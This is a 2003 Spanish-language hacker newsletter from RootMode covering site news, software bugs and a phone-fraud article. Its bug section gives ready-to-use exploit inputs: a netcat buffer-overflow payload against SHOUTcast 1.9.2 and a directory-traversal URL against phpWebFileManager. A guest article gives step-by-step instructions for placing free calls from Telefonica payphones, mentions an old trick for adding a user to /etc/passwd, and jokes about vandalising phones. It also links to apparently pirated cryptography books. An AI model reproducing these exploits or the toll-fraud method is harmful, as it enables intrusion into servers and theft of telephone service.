Boletín de seguridad informática de [RootMode]
Nro: 7mo boletín
Sábado, 15 de Noviembre de 2003
http://rootmode.com.ar
- ------------------------------------------------------------------
I N D I C E :

[1] Introducción
[2] El site
[3] Buggies
[4] Artículos
[5] Note
[6] Links
[7] The End

- ------------------------------------------------------------------
[1] 7mo boletín de [RootMode] y 1er boletín quincenal. Y voy por más
:)
Buenas noticias!
Tengo un nuevo servidor en el cual estoy subiendo de todo.[Thnks to
KRZN]
Ya lo que respecta a Cisco, esta accesible y en actualización
constante. Así mismo para las otras secciones del sitio como
Wordlists,
Textos, Criptografía, etc; estoy subiendo más material. En el próximo
boletín más detalles..Esten atentos!

==================================================================
[2] El site
==================================================================
Las secciones del site nuevamente tienen password, para limitar el
ancho de banda, y que este sea usado solo por miembros del boletín.
[+]Más info: http://rootmode.com.ar/password.php

- ---
[?]Como acceder a las secciones?
El acceso es el mismo de siempre, solo que cuando intentes descargar
un archivo, te pedira el usuario y password.
- ---

[*]Recomendación:
http://rootmode.com.ar/cisco.php

==================================================================
[3] Buggies
==================================================================

 DoS en SHOUTcast server
[-----------------------]

Versión: 1.9.2
Vulnerabilidad: Al enviar peticiones al servidor con un tamaño
excesivo provoca un buffer overflow pudiendo ejecutar código
arbitrario.

Exploit:[Usando NC]
- --------
nc target 8001
changeme
icy-name:AAA...[Ax275]BBBB
icy-genre:Bang-bang
icy-url:AAA...[Ax288]BBBB
icy-pub:1
icy-irc:N/A
icy-icq:N/A
icy-aim:N/A
icy-br:160

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

 Directory traversal en phpWebFileManager
[----------------------------------------]

Version: 2.0.0
Vulnerabilidad: La falla radica en la variable $f, la cual no
verifica los ".."

Exploit:
- --------
http://www.target.com/phpwebfilemgr/index.php?f=../../

==================================================================
[4] Artículos
==================================================================
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
.::Titulo : Llamadas gratis x telefonos publicos::.
.::Servicio : Telefonica::. 
.::Fecha : 19/11/03::.
.::Autor : l0stb0y::.
.::E-Mail : l0stb0y@elportal.info::.
.::Web : www.elportal.info::.
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_

La forma de llamar a cualquier numero que se explicara a continuacion
funciona en todos los telefonos publicos de Telefonica y se probo
solamente en Argentina... si no sabes de que tipo de telefonos
publicos hablamos, adjunte algunas fotos asi los reconoces. [*]

Antes que nada, sepan que toda informacion aqui expuesta no va a
ser de agrado de todos, asi que mientras mas lejos de Mr Telefonica
este esto, mejor, y lo podran seguir usando sin que reparen el error.

La forma es la siguiente... se levanta el tubo (no, no es obvio) y se
marca rapidamente el numero completo a donde deseas llamar exepto por
el ultimo numero, ej;

Quiero llamar a: 4-682-1234

entonces levanto y marco: 4,6,8,2,1,2,3.... 

una vez esto echo y si lo hicimos rapido, empezamos a escuchar los
tonos marcandose. Al escuchar el tono correspondiente al ante ultimo
numero (en este caso 3) marcamos rapido el numero faltante (4),
cortamos el telefono con apenas un toque en la palanquita y marcamos
"110"

entonces...

levantamos, marcamos 4,6,8,2,1,2,3... (escuchamos los 7 tonos...) ni
bien escuchamos el ultimo marcamos 4 y colgamos rapidamente, es decir
no hay que mantener la palanca para cortar apretada, solamente tocar
por una fraccion de segundo, luego de esto marcamos rapido el numero
110

una vez echo todo esto el telefono mostrara "110" y la llamada sera
realizada hacia 4-682-1234 en este caso.

Llevar a cabo esto no es tan facil, y es probable que te lleve varias
practicas hasta que te salga, pero funciona.


el porque?... hmm quien pregunto?

En proximos documentos lo sabran... ;)

pero supongo que es alguna relacion que hace el telefono al marcar
110
despues de haber colgado y alguna manera esconde el numero a llamar
...
(dentro del 110)

es algo asi como alguna vez funciono;

Linux Red Hat blabla
User: este-es-mi-user... ( x cantidad de espacios ) ...
echo im-da-owner:x:bla >> etc/passwd

y creaba un nuevo usuario.

Por ahora es todo...

En las fotos vemos como un grupo de muchachos exaltados al resultarle
muy dificl este truco destroza furtivamente [?] los telefonos de la
compania. eehmm no estamos insitando a nada.

- -l0stb0y-(l0stb0y@elportal.info)

==================================================================
[5] Note
==================================================================
- ---
[*] Las fotos correspondientes al artículo anterior, las podrán
encontrar aquí:[Por orden de aparición]

http://elportal.info/documentos/telefonia/LGxTP/pic8.jpg
http://elportal.info/documentos/telefonia/LGxTP/pic4.jpg
http://elportal.info/documentos/telefonia/LGxTP/pic2.jpg
http://elportal.info/documentos/telefonia/LGxTP/pic6.jpg
http://elportal.info/documentos/telefonia/LGxTP/pic1.jpg
http://elportal.info/documentos/telefonia/LGxTP/pic3.jpg
http://elportal.info/documentos/telefonia/LGxTP/pic5.jpg
http://elportal.info/documentos/telefonia/LGxTP/pic7.jpg
- ---
==================================================================
[6] Links
==================================================================

- - Nunca me cansaré de recomendarlo
http://www.agujero.com

- - Need hosting? look this!!
http://www.aeolushosting.com.ar

- - Little magic dragon [Draco] New Release
http://rootmode.com.ar/irc.php

- - Internet Explorer 6 Service Pack 1
http://www.microsoft.com/downloads/details.aspx?FamilyId=9D8543E9-
0E2B-46C9-B6C6-12DE03860465&displaylang=en

- - Internet Explorer 6 Service Pack 1
http://www.microsoft.com/downloads/details.aspx?FamilyId=35F99CF5-
3629-4E0E-BF60-24845D2D20C9&displaylang=en

- - Internet Explorer 6 Service Pack 1 para Windows Server 2003
http://www.microsoft.com/downloads/details.aspx?FamilyId=7D0D02DD-
8940-48E0-B163-3FCDCB558F21&displaylang=en

- - Internet Explorer 6 Service Pack 1 para Windows Server 2003
http://www.microsoft.com/downloads/details.aspx?FamilyId=8BEFA1EC-
0C48-4B65-989D-58B0CE1E6F95&displaylang=en

- - Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?FamilyId=4C4D22F0-
FBF7-4EA6-9CC2-27D104D4198E&displaylang=en

- - Internet Explorer 5.5 Service Pack 2
http://www.microsoft.com/downloads/details.aspx?FamilyId=E438AFD4-
DF70-448C-8925-1075C8BE6C5E&displaylang=en

- - Internet Explorer 5.01 Service Pack 4
http://www.microsoft.com/downloads/details.aspx?FamilyId=C15E2DB3-
14E2-43A4-A1A1-676374B66517&displaylang=en

- - Internet Explorer 5.01 Service Pack 3
http://www.microsoft.com/downloads/details.aspx?FamilyId=F4853D8F-
F66C-4D8A-9979-3B4F540F90A8&displaylang=en

- - Internet Explorer 5.01 Service Pack 2
http://www.microsoft.com/downloads/details.aspx?FamilyId=221616D4-
5893-4DA4-A223-B0DE548D6D83&displaylang=en

==================================================================
[7] The End
==================================================================
[Edited 19/11/03]
El boletín estaba listo para salir el 15, pero me puse a diseñar un
par de cosas y el tiempo se me paso. Sepan disculpar. :)
Nos vemos en un par de días
P.D:
Para compensar el retraso del boletín, aquí tienen 3 excelentes
textos de criptografía: Enjoy it!
[URL] http://www.zerobyte.com.ar/Crypto/
[1]Algoritmicheskie osnovi ..>.rar [En ruso :P]
[2]An Introduction To Cryptography(pdf).rar [Inglés]
[3]Cryptography - Theory And Practice(html).rar [Inglés]
[4]Handbook Of Applied Cryptography(pdf).rar [Inglés]
[5]Shnider - Applied Cryptography(pdf).rar [En ruso :P]

Saludos..
           Zero_Byte    mailto:info@rootmode.com.ar
